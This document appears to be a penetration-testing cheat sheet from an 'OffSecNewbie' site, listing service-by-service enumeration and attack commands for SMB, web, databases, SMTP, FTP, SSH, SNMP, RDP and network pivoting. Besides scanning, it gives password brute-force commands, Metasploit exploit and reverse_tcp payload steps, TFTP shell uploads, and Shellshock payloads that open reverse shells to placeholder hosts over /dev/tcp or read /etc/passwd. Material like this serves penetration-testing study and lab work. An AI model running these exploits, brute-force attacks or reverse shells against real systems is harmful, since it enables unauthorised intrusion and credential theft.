www.OffSecNewbie.com
Network

Scan for hosts
nmap -sn $iprange -oG - | grep Up | cut -d' ' -f2 > network.txt
Port scanning
TCP Top 1000:
nmap -Pn -sC -sV -oA tcp -vv $ip
All TCP Ports:
nmap -Pn -sC -sV -oA all -vv -p- $ip
When you're getting no where with the TCP ports - try UDP ports. Easily forgotten about!
UDP Top 100:
nmap -Pn -sU --top-ports 100 -oA udp -vv $ip
Utilize nmap's scripts
Find script related to a service your interested in, example here is ftp
locate .nse | grep ftp
What does a script do?
nmap --script-help ftp-anon
Uniscan
uniscan -u $ip -qweds
Vulnerability scanning
Search services vulnerabilities
searchsploit --exclude=dos -t apache 2.2.3
msfconsole; > search apache 2.2.3
DNS
Find name servers
host -t ns $ip
Find email servers
host -t mx $ip
Subdomain bruteforcing
for ip in $(cat list.txt); do host $ip.$website; done
Reverse dns lookup bruteforcing
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
Zone transfer request
host -l $ip ns1.$ip
dnsrecon -d $ip -t axfr
Finds nameservers for a given domain
host -t ns $ip| cut -d " " -f 4 #
dnsenum $ip
Nmap zone transfer scan
nmap $ip --script=dns-zone-transfer -p 53
Finds the domain names for a host.
whois $ip
Find the IP and authoritative servers.
nslookup $ip
Finds miss configure DNS entries.
host -t ns $ip
TheHarvester finds subdomains in google, bing, etc
python theHarvester.py  -l 500 -b all -d $ip
SMB and SAMBA
Server Message Block (SMB) Protocol is a network file sharing protocol, and as implemented in Microsoft Windows
Samba has provided secure, stable and fast file and print services for all clients using the SMB/CIFS protocol, such as all versions of DOS and Windows, OS/2, Linux and many others
 SMB Version
 Windows version
 CIFS 
 Microsoft Windows NT 4.0
 SMB 1.0
 Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2
 SMB 2.0
 Windows Vista & Windows Server 2008
 SMB 2.1
 Windows 7 and Windows Server 2008 R2
 SMB 3.0
 Windows 8 and Windows Server 2012
 SMB 3.0.2
 Windows 8.1 and Windows Server 2012 R2
 SMB 3.1.1
 Windows 10 and Windows Server 2016
SMB uses the following TCP and UDP ports:
netbios-ns 137/tcp # NETBIOS Name Service
netbios-ns 137/udp
netbios-dgm 138/tcp # NETBIOS Datagram Service
netbios-dgm 138/udp
netbios-ssn 139/tcp # NETBIOS session service
netbios-ssn 139/udp
microsoft-ds 445/tcp # if you are using Active Directory
Enumeration
mblookup — NetBIOS over TCP/IP client used to lookup NetBIOS names
smbenum.sh
#!/bin/bash
​
#SMB Enumeration using nmap
#(c) Mike Digital Offensive
​
if [ -z "$1" ]
 then
  echo "Error please provide host to enumerate"
  exit
else
 nmap -script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $1
fi
Samba version checker
smbver.sh
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1 
nmblookup -A $ip
enum4linux -a $ip
Used to enumerate data from Windows and Samba hosts and is a wrapper for smbclient, rpcclient, net and nmblookup
Look for users, groups, shares, workgroup/domains and password policies
list smb nmap scripts
locate .nse | grep smb
find SAMBA version number using the SMB OS discovery script:
nmap -A $ip -p139
then google to see if version is vulnerable
SAMBA 3.x-4.x #  vulnerable to linux/samba/is_known_pipename
SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename
smbmap
default port it checks is 445, use -P 139 to point it at that port if 445 fails
smbmap -H $ip
smbmap -R $sharename -H $ip #Recursively list dirs, and files
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q #downloads a file in quiet mode
Download all 
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
downloads to the /usr/share/smbmap directory
generally works a bit better than enum4linux as it enum4linux tends to error out a bit
Ippsec using this tool
https://www.youtube.com/watch?v=jUc1J31DNdw&t=445s​
Use the GUI to browse and download ^ example above
Brute force login
medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv
RID
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum. If you specify a password file, it will automatically attempt to brute force the user accounts when its finished enumerating.
https://tools.kali.org/maintaining-access/ridenum
Null Session
A null SMB session can be used to gather passwords and useful information from SMB 1 by looking in shares that are not password protected for interesting files. Windows NT/2000 XP default settings allow this. Windows 2003/XP SP2 SMB this behaviour is disabled.
Null session and extract information.
nbtscan -r $ip
Version
msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run
MultiExploit
msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run
Show all nmap SMB scripts
ls -ls /usr/share/nmap/scripts/smb*
Quick enum:
nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
Quick vuln scan:
nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
Full enum and vuln scanning:
nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
Full enum & vuln scan:
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
Mount:
smbclient //$ip/share -U username
smblclient -N -L \\$ip
Anonymous mount:
smbclient //$ip/share # hit enter with blank password
Eternal Blue
Exploits a critical vulnerability in the SMBv1 protocol
Worth testing Eternal blue - you might get lucky although (the system should be patched to fix this)
Vulnerable versions
Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016
nmap -p 445 $ip --script=smb-vuln-ms17-010
Bruteforce
hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
Any metasploit exploit through Netbios over TCP in 139, you need to set:
set SMBDirect false
NFS
Show all mounts
showmount -e $ip
Mount a NFS share
mount $ip:/vol/share /mnt/nfs
Web
If you get a certificate redirecting you to 443/https check for alt names
add these to /etc/hosts file
nikto -h $ip
nikto -h $ip -p 80,8080,1234 #test different ports with one scan
-Tuning Options
0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Top1000-RobotsDisallowed.txt; gobuster -u http://$ip -w Top1000-RobotsDisallowed.txt
Directory Discovery
use a few different files, check seclists for web discovery 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://$ip/FUZZ
It is worth scanning using a good number of word lists as well as scanning the directories recursively - which takes time. 

Its good to refer back to your findings when you're stuck. It may help you find where shells have been uploaded to.
https://github.com/PinkP4nther
#follow guide, might have to run these commands if guide doesnt work then re run guideapt install cargo, apt install pkg-config
./erodir -u http:/$ip -e /usr/share/wordlists/dirb/common.txt -t 20
gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o gobuster-root -t 50
works recursively
cd /root/dirsearch; python3 dirsearch.py  -u http://$ip/ -e .php
If really stuck run this
for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -l -s "200,204,301,302,307" -t 20 ; done
Banner grabbing
./whatweb $ip # identifies all known services
Methods testing
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Brute Forcing authentication
hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
Vulnerability scanning:
nikto -host http://$ip
nmap --script=http-vuln* $ip 
Test against SQLI
sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql  
Coldfusion vulnerability scanning
nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
Brute force basic auth
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
If you can register yourself on the site like a normal users - do this. There maybe an upload feature of the site which you can take advantage of.
WebDav
Test for it
davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver http://$ip:8080/webdav/
Mysql
nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
Nmap scan
nmap -sV -Pn -vv -script=mysql* $ip -p 3306
Vuln scanning:
sqlmap -u 'http://$ip/login-off.asp' --method POST  --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
If Mysql is running as root and you have access, you can run commands:
mysql> select do_system('id');
mysql> \! sh
Enumerate MSSQL Servers on the network
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info $ip
Bruteforce MsSql
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Log in to a MsSql server:
# root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa
​
root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
SQL
/5-sql
SMTP
Always do users enumeration
for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
use auxiliary/scanner/smtp/smtp_enum
Command to check if a user exists
VRFY root
Command to ask the server if a user belongs to a mailing list
EXPN root
Enumeration and vuln scanning:
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
Bruteforce
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Metasploit user enumeration
use auxiliary/scanner/smtp/smtp_enum
Testing for open relay
telnet $ip 25
EHLO root
MAIL FROM:root@target.com
RCPT TO:example@gmail.com
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT
RPC (135)
Enumerate, shows if any NFS mount exposed:
rpcinfo -p $ip
nmap $ip --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom
FTP enumeration
Enumerate:
nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Bruteforce
hydra -l user -P /usr/share/john/password.lst ftp://$ip:21
Bruteforce with metasploit
msfconsole -q msf> search type:auxiliary login: msf> use auxiliary/scanner/ftp/ftp_login
Vuln scan
nmap --script=ftp-* -p 21 $ip
TFTP
If unauthenticated access is allowed with write permissions you can upload a shell:
tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
nmap -sU -p 69 --script tftp-enum.nse $ip 
or
use auxiliary/scanner/tftp/tftpbrute
connecting/interacting: 
tftp $ip
tftp> put payload.exe 
tftp> get file.txt
SSH
User enumeration
use auxiliary/scanner/ssh/ssh_enumusers
set user_file /usr/share/wordlists/metasploit/unix_users.txt
or
set user_file /usr/share/seclists/Usernames/Names/names.txt
run
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
Bruteforce
hydra -v -V -l root -P password-file.txt $ip ssh
With list of users:
hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
You can use -w to slow down
SSL
Open a connection
openssl s_client -connect $ip:443
Basic SSL ciphers check
nmap --script ssl-enum-ciphers -p 443 $ip
Look for unsafe ciphers such as Triple-DES and Blowfish
Very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...
SNMP
Enumeration
enumerate Community strings 
./onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.11.1.73
Community string too long
If you see this download onesixtyone from Github and run it there
v1
snmp-check -t $ip -c public
use nmap to enumerate info
nmap -sU -p161 --script "snmp-*" $ip
snmpwalk
apt install snmp-mibs-downloader #translates MIBs into readable format
for community in public private manager; do snmpwalk -c $community -v1 $ip; done
snmpwalk -c public -v1 $ip
snmpenum $ip public windows.txt
Less noisy:
snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
Based on UDP, stateless and susceptible to UDP spoofing
nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
snmpwalk -c public -v1  10.1.1.1 # we need to know that there is a community called public
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
POP3
Test authentication:
telnet $ip 110
USER uer@$ip
PASS admin
list
retr 1
Finger
port 79
https://touhidshaikh.com/blog/?p=914
Find Logged in users on target.
finger @$ip
if there is no user logged in this will show no username
Check User is existed or not.
finger $username@$ip
The finger command is very useful for checking users on target but it’s painful if brute-forced for a username.
Using Metasploit fo Brute-force target
use auxiliary/scanner/finger/finger_users
set rhosts $ip
set users_file 
run
cd /tmp/
wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
tar -xvf finger-user-enum-1.0.tar.gz
cd finger-user-enum-1.0
perl finger-user-enum.pl -t 10.22.1.11 -U /tmp/rockyou-top1000.txt
RDP
Install RDP nmap scripts
https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/amp/
nmap -p 3389 --script rdp-ntlm-info $ip
Bruteforce
ncrack -vv --user administrator -P password-file.txt rdp://$ip
hydra -t 4  -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Kerberos
Test MS14-068
LDAP
Enumeration:
ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"
Email addresses enumeration
Find emails in google, bing, pgp etc
theharvester -d $ip -b google
Contact information for the domains they host
whois $ip
Find emails and employee name with Recon-ng:
recon-ng; use module; set DOMAIN $ip; run;
recon/contacts/gather/http/api/whois_pocs
Find xss published ad xssed.co
recon/hosts/enum/http/web/xssed
Find subdomain
recon/hosts/gather/http/web/google_site
Finds IPs close to the domain and possible new domains
recon/hosts/gather/http/web/ip_neighbor
Google search
site:xxx -site:www.xxx
filetype: look for specific documents, pdf, docx, etc..
inurl
intitle
Others https://www.exploit-db.com/google-hacking-database/
nmap has many vulnerability scanning NSE scripts in /usr/share/nmap/scripts/
OpenVAS
Powerful vulnerability scanner with thousands of scan checks. Setup:
openvas-setup; openvas-adduser; gsd
Well known exploits
Shellshock
The following tool will test it.
git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose;  ./shocker.py -H $ip  --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose
You can also:
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80
curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status
Shellshock over SSH:
ssh username@$ip '() { :;}; /bin/bash'
Exploit shellshock via curl, use -k switch to force curl to bypass any SSL warnings. Replace the bash command with anything.
curl http://192.168.123.123/path/to/cgi- bin/name_of_vuln_cgi -H "custom:() { ignored; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1 "
HeartBleed
Test web server
sslscan $ip:443
Internet explorer 6
Vulnerable to msf exploit(ms10_002_aurora)
Tunneling your traffic through another host
sshuttle -r root@$ip 10.10.10.0/24
Port forwarding
Simplest type of traffic redirection, consists on accepting traffic from one address and port port and redirecting it to another address and port.
It can be useful to bypass address and port based filters. Rinetd is a linux tool to do it.
Local port forwarding
Creates an encrypted tunnel through two machines and have traffic redirected to a final host and port, similar to port forwarding This is useful when you are trying to connect from your machine to a destination using a gateway. The syntax is:
ssh gateway_host -L local_port:remote_host:remote_port
You can later create a SSH session to the local port and have and SSH tunneled to destination:
ssh hop_machine -L 31337:banned_machine:22
ssh -p 31337 localhost
Remote port forwarding
It creates a tunnel from the target machine to your local machine, which allows connecting to an arbitrary port on the target. Useful if the target is in a non-routable network from your local machine. This is useful when you are trying to connect to a host, behind a firewall that blocks incoming connections. This technique works as the previous one, but the connection is started from the gateway. The syntax is:
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic Port Forwarding
Allows to create a tunnel from the target to your machine, and have the traffic routed to any host through target. You can configure a local port to forward traffic to multiple destinations passing through a single host. It is similar to local port forwarding but allows multiple destinations. It uses the SOCKS protocol. The syntax is:
ssh -D local_port remote_add 
The connection of the previous command is established at port 22 of remote addr.
Pivoting
1. drop 3proxy.exe
2. Set up a config file:
allow *_
internal IP_SAME_NETWORK
external IP_OTHER_NETWORK
socks -p1081
3. Add to /etc/proxychains.conf:
socks4  IP_SAME_NETWORK 1081
4. Scan:
proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5
Double-pivoting
Pivoting through two different networks:
First, create a dynamic port forwarding through the first network:
ssh -f -N -D 9050 root@10.1.2.1
Edit /etc/proxychains.conf and add as default gateway:
socks4 127.0.0.1 9050
Use the proxy to create a second dynamic port forward to the second network:
proxychains ssh -f -N -D 10050 root@10.1.2.1 -p 22
Edit again /etc/proxychains.conf and add as default gateway:
socks4 127.0.0.1 10050
You can now use proxychains to pivot to the target network:
proxychains nmap -sTV -n -PN 10.1.2.1 -254
CVEs
http://www.cvedetails.com/
https://www.exploit-db.com/
Word Lists
/usr/share/seclists/
/usr/share/wordlist/
/usr/share/metasploit-framework/data/wordlists/
Minimal web server
for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done
​
Proxy
Protocols
http://
http://
connect://
sock4://
sock5://
Passive OSINT
Linux
Last updated -1
SMB Version	Windows version
CIFS	Microsoft Windows NT 4.0
SMB 1.0	Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2
SMB 2.0	Windows Vista & Windows Server 2008
SMB 2.1	Windows 7 and Windows Server 2008 R2
SMB 3.0	Windows 8 and Windows Server 2012
SMB 3.0.2	Windows 8.1 and Windows Server 2012 R2
SMB 3.1.1	Windows 10 and Windows Server 2016